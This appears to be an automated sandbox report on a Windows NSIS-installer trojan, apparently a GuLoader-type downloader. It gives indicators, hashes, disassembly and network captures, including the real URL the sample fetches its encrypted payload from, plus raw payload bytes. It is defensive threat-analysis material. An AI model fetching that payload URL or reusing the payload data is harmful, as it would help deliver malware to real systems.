https://babalharra.com.au/ES | 0% | Avira URL Cloud | safe
https://babalharra.com.au/yzSJO174.bin | 0% | Avira URL Cloud | safe

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
babalharra.com.au | 122.201.127.17 | true | false | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://babalharra.com.au/yzSJO174.bin | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
https://babalharra.com.au/yzSJO174.binK | Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ftp.ftp://ftp.gopher. | Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Ntwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Ntwph4urc1.exe, 00000000.00000000.2173648853.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000006.00000000.2688245914.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | high
https://babalharra.com.au/ | Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://babalharra.com.au/ES | Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
122.201.127.17 | babalharra.com.au | Australia | 38719 | DREAMSCAPE-AS-AP Dreamscape Networks Limited, AU | false
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588721
                  Start date and time:2025-01-11 04:40:10 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Ntwph4urc1.exe
                  renamed because original name is a hash value
                  Original Sample Name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@3/5@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 41
                  • Number of non-executed functions: 306
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:42:35 | API Interceptor | 3x Sleep call for process: Ntwph4urc1.exe modified
IPs
Match: 122.201.127.17
Associated Sample Name / URL | Detection | Threat Name | Context
02Eh1ah35H.exe | malicious | FormBook, GuLoader |
Document_084462.scr.exe | malicious | FormBook, GuLoader |
http://constructivesoftware.com.au | malicious | Unknown |

Domains
Match: babalharra.com.au
Associated Sample Name / URL | Detection | Threat Name | Context
02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
Document_084462.scr.exe | malicious | FormBook, GuLoader | 122.201.127.17

ASNs
Match: DREAMSCAPE-AS-AP Dreamscape Networks Limited, AU
Associated Sample Name / URL | Detection | Threat Name | Context
02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
http://www.austrata.net.au | malicious | Unknown | 185.184.154.201
https://snip.ly/kx81x2 | malicious | Unknown | 203.170.87.17
la.bot.arm5.elf | malicious | Mirai | 103.226.223.88
https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.com | malicious | Unknown | 203.170.84.122
Last Annual payment.htm | malicious | Phisher | 203.170.84.122
http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.js | malicious | Unknown | 203.170.86.89
PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 103.20.200.105
Document_084462.scr.exe | malicious | FormBook, GuLoader | 122.201.127.17
http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA== | malicious | Unknown | 203.170.87.17

JA3 Fingerprints
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
2976587-987347589.08.exe | malicious | Unknown | 122.201.127.17
yMXFgPOdf2.exe | malicious | GuLoader | 122.201.127.17
2976587-987347589.07.exe | malicious | Unknown | 122.201.127.17
yMXFgPOdf2.exe | malicious | GuLoader | 122.201.127.17
02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
LMSxhK1u8Z.exe | malicious | GuLoader | 122.201.127.17
ro7eoySJ9q.exe | malicious | GuLoader | 122.201.127.17
ro7eoySJ9q.exe | malicious | GuLoader | 122.201.127.17
4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT | 122.201.127.17
ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 122.201.127.17

Dropped Files
Match: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name | Context
02Eh1ah35H.exe | malicious | FormBook, GuLoader |
02Eh1ah35H.exe | malicious | GuLoader |
Document_084462.scr.exe | malicious | FormBook, GuLoader |
Document_084462.scr.exe | malicious | GuLoader |
PO.exe | malicious | GuLoader |
PO.exe | malicious | GuLoader |
yuc1Jwlkh5.exe | malicious | GuLoader |
yuc1Jwlkh5.exe | malicious | GuLoader |
IMAGE000Pdf.exe | malicious | GuLoader |
stormskridtets.exe | malicious | FormBook, GuLoader |
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.737556724687435
                                            Encrypted:false
                                            SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                            MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                            SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                            SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                            SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 02Eh1ah35H.exe, Detection: malicious
• Filename: 02Eh1ah35H.exe, Detection: malicious
• Filename: Document_084462.scr.exe, Detection: malicious
• Filename: Document_084462.scr.exe, Detection: malicious
• Filename: PO.exe, Detection: malicious
• Filename: PO.exe, Detection: malicious
• Filename: yuc1Jwlkh5.exe, Detection: malicious
• Filename: yuc1Jwlkh5.exe, Detection: malicious
• Filename: IMAGE000Pdf.exe, Detection: malicious
• Filename: stormskridtets.exe, Detection: malicious
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):116773
                                            Entropy (8bit):1.2617404262864118
                                            Encrypted:false
                                            SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                            MD5:753C4F9B2F84095556E2C65E2569D814
                                            SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                            SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                            SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                            Malicious:false
                                            Reputation:low
                                            Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):222131
                                            Entropy (8bit):1.2548431305039245
                                            Encrypted:false
                                            SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                            MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                            SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                            SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                            SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                            Malicious:false
                                            Reputation:low
                                            Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):282823
                                            Entropy (8bit):7.646614769640198
                                            Encrypted:false
                                            SSDEEP:6144:lvvE12Nsu4oMNgJMD20aAW49+ShpU5tgrLMpaP:lXmkMNOZq+Sh1rL4Y
                                            MD5:9CE7FE4FC49B74D4A9E8E63C97EDA3D7
                                            SHA1:0DF4A59A5F43A5A406B28D449369D25B4EA35B49
                                            SHA-256:ECB2D16F05215EE09B30050618170CBFD7B6E52D128B4429F69D1B419974842C
                                            SHA-512:7F55112F98B31966A41DBD77AA416BA8964CE689679E2EA4C218398FBAD1319C5ABDE73222DCDCD6CEB53F5A1224234427F611686DD44DB29919230587782C98
                                            Malicious:false
                                            Reputation:low
                                            Preview:.....kk.t...[[[[.......S...Z........................33...u...,........U......f...pp...........`............................................`...............W............II....l......................,,,...........kk.........99.............................?.N......##.......xx...F........%.n...T........vvv...................."....................:...........pp..++......IIIII...$...{..{.uu....................4444..$.E.%..#........................v.......................L..{...;.GG....mm.......oo.J.K...P.JJJ.......}}.....//..........RR.........................%%%%.....8..9.......F...ll........................j..........gg......%%........o................#......WWWWW.............................*......R............s.....HH...................i.HH....P.....d.......p.................D......---....NN.......yy.j...................99................?.........................[[....>>>>..................................LL...........U....................4...$...`....55....................J.=..........
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):477418
                                            Entropy (8bit):1.2516735777117096
                                            Encrypted:false
                                            SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                            MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                            SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                            SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                            SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                            Malicious:false
                                            Reputation:low
                                            Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.957710020525607
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Ntwph4urc1.exe
                                            File size:437'610 bytes
                                            MD5:c57da1bb37a79e6f05722518dbadb3ce
                                            SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
                                            SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
                                            SHA512:872e1e462cd6ebdd2140463fa8ad91675840a754b4c3ef52641c7bcfdb4d8951decbffb284344e9a8a2c2ad93d8821ea973eac6d434552d7a88236a1a054f933
                                            SSDEEP:12288:B3UIjsVFWZn9dzBoT2T/B1iP4C5tU2US0zT:B3UIjsVFWZf1oPPbU2US0z
                                            TLSH:F3942384B2D0A337D9EB6F31693A23321E9D48505C7DB3434F5C7A10773968A9B2E7A1
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                            Icon Hash:3d2e0f95332b3399
                                            Entrypoint:0x4034a2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080CCh]
                                            call dword ptr [004080D0h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [007A8A6Ch], eax
                                            je 00007FF5C0D93913h
                                            push ebx
                                            call 00007FF5C0D96C01h
                                            cmp eax, ebx
                                            je 00007FF5C0D93909h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007FF5C0D96B7Bh
                                            push esi
                                            call dword ptr [00408154h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FF5C0D938ECh
                                            push 0000000Bh
                                            call 00007FF5C0D96BD4h
                                            push 00000009h
                                            call 00007FF5C0D96BCDh
                                            push 00000007h
                                            mov dword ptr [007A8A64h], eax
                                            call 00007FF5C0D96BC1h
                                            cmp eax, ebx
                                            je 00007FF5C0D93911h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007FF5C0D93909h
                                            or byte ptr [007A8A6Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408038h]
                                            push ebx
                                            call dword ptr [00408298h]
                                            mov dword ptr [007A8B38h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0079FF08h
                                            call dword ptr [0040818Ch]
                                            push 0040A2C8h
                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804
                                             Name | Virtual Address | Virtual Size | Is in Section
                                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0xb48 | .rsrc
                                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                             .text | 0x1000 | 0x656c | 0x6600 | 12117ad2476c7a7912407af0dcfcb8a7 | False | 0.6737515318627451 | data | 6.47208759712619 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                             .rdata | 0x8000 | 0x1398 | 0x1400 | e3e8d62e1d2308b175349eb9daa266c8 | False | 0.4494140625 | data | 5.137750894959169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             .data | 0xa000 | 0x39eb78 | 0x600 | 2020ca26e010546720fd467c5d087b57 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                             .rsrc | 0x3c7000 | 0xb48 | 0xc00 | 13d9a87cc14830e1f01c641a62386bbe | False | 0.4215494791666667 | data | 4.357284806500026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                             RT_ICON | 0x3c71c0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
                                             RT_DIALOG | 0x3c74a8 | 0x100 | data | English | United States | 0.5234375
                                             RT_DIALOG | 0x3c75a8 | 0x11c | data | English | United States | 0.6056338028169014
                                             RT_DIALOG | 0x3c76c8 | 0xc4 | data | English | United States | 0.5918367346938775
                                             RT_DIALOG | 0x3c7790 | 0x60 | data | English | United States | 0.7291666666666666
                                             RT_GROUP_ICON | 0x3c77f0 | 0x14 | data | English | United States | 1.2
                                             RT_MANIFEST | 0x3c7808 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                             DLL | Import
                                             ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                             SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                             ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                             COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                             USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                             GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                             KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                             Language of compilation system | Country where language is spoken | Map
                                             English | United States |
                                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                             2025-01-11T04:42:16.439704+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49986 | 122.201.127.17 | 443 | TCP
                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                             Jan 11, 2025 04:42:14.883301973 CET | 52157 | 53 | 192.168.2.6 | 1.1.1.1
                                             Jan 11, 2025 04:42:14.923250914 CET | 53 | 52157 | 1.1.1.1 | 192.168.2.6
                                             Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                             Jan 11, 2025 04:42:14.883301973 CET | 192.168.2.6 | 1.1.1.1 | 0x488c | Standard query (0) | babalharra.com.au | A (IP address) | IN (0x0001) | false
                                             Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                             Jan 11, 2025 04:42:14.923250914 CET | 1.1.1.1 | 192.168.2.6 | 0x488c | No error (0) | babalharra.com.au | | 122.201.127.17 | A (IP address) | IN (0x0001) | false
                                            • babalharra.com.au
                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             0 | 192.168.2.6 | 49986 | 122.201.127.17 | 443 | 2224 | C:\Users\user\Desktop\Ntwph4urc1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             2025-01-11 03:42:15 UTC | 174 | OUT | GET /yzSJO174.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: babalharra.com.au
                                            Cache-Control: no-cache
                                             2025-01-11 03:42:16 UTC | 249 | IN | HTTP/1.1 200 OK
                                            Date: Sat, 11 Jan 2025 03:42:16 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Last-Modified: Tue, 03 Dec 2024 05:37:53 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 290368
                                            Content-Type: application/octet-stream
                                            2025-01-11 03:42:16 UTC8000INData Raw: 5f b1 cb e4 e4 ec 1f d4 f2 14 fc 03 72 33 23 6d c7 1d 1f 8d 43 3e 6b 75 b7 70 18 26 dd 74 f9 06 fa 42 df 81 7f bf 2a 7b 7e d7 08 a9 05 8d 85 b0 c2 ce 33 57 aa ae a5 e1 a6 30 92 03 90 68 f3 6c 83 4c 9b 07 ea b9 68 72 09 cf d1 ff 1b ac 87 8c 01 c5 97 53 a1 dc 78 63 9d 03 e9 31 e1 60 18 d2 20 fd 21 db 9f 39 83 8f 7a a0 3a 4b fe 9e 3f 16 de 9f 39 c2 48 3c e5 92 be 1e 98 6d 64 a0 23 7a b5 14 13 f3 d6 b8 f9 5c e7 b6 d7 b3 99 1b 65 ac 93 d9 6e f6 04 d6 42 a4 1e 9e 35 a9 8d 6d 31 94 fa 41 f7 ea a0 12 3b 29 0e 1b 6e ea 11 2f f3 18 bc 19 91 2b 8d 4a e7 6f 09 1b 50 37 65 75 f1 4c 0d ef af 56 6c 0e c5 db 6c e8 2c 02 be 09 a6 78 0e eb c4 e3 54 0a f6 ce 66 8f 96 93 b7 f8 19 cf 2c 67 2a 80 a4 e2 f5 27 4e 1e 68 ab a6 e5 8e f3 17 0b 16 83 24 63 60 af 12 67 fc 06 c1 48 ca
                                            Data Ascii: _r3#mC>kup&tB*{~3W0hlLhrSxc1` !9z:K?9H<md#z\enB5m1A;)n/+JoP7euLVll,xTf,g*'Nh$c`gH
                                            2025-01-11 03:42:16 UTC8000INData Raw: 87 db ca 1b 32 e7 a3 83 93 8f 81 1b 34 80 61 f8 68 ec be 56 3c e8 ec 78 97 05 20 82 2d 33 bb be ba e7 24 e2 af c2 7e ba 92 a2 b7 8c 49 b7 80 19 f8 82 fe 36 60 a3 b8 7c 87 96 d4 5c 2a 36 2d cf 30 b2 78 d6 04 08 f1 88 26 bb 4b e3 45 9b f9 b6 c5 7a ca df e7 d3 1b 92 65 c2 2a 98 55 b6 7d ba b9 56 43 d9 fb 3e f9 a8 df c9 08 1c 40 08 15 76 ce ea 50 fc 46 db 07 94 f9 dd d8 bf 81 32 74 49 c0 c6 83 10 cc b7 12 af 36 dd 0d 50 41 98 84 b2 ec b1 f5 8a 73 e1 8b ee 82 a5 74 ca e0 c1 79 1b 59 02 73 49 64 d7 2e 2e a2 da e6 a9 a3 80 8f 71 c7 32 07 a4 c7 42 3d 39 f5 fe 64 6b 8f eb 30 f3 e6 9f 05 4d 40 14 58 9e a3 ec bf 09 b5 3d 72 39 c1 8c 5e 56 0f 17 11 dc 45 1d a3 93 7c 54 8d a7 6e 9b 4f f6 b9 78 ac d7 ae d4 d8 f8 8b 3d ce f9 14 54 9a ab 6a c9 8b d6 40 99 de 30 24 b9 9c
                                            Data Ascii: 24ahV<x -3$~I6`|\*6-0x&KEze*U}VC>@vPF2tI6PAstyYsId..q2B=9dk0M@X=r9^VE|TnOx=Tj@0$
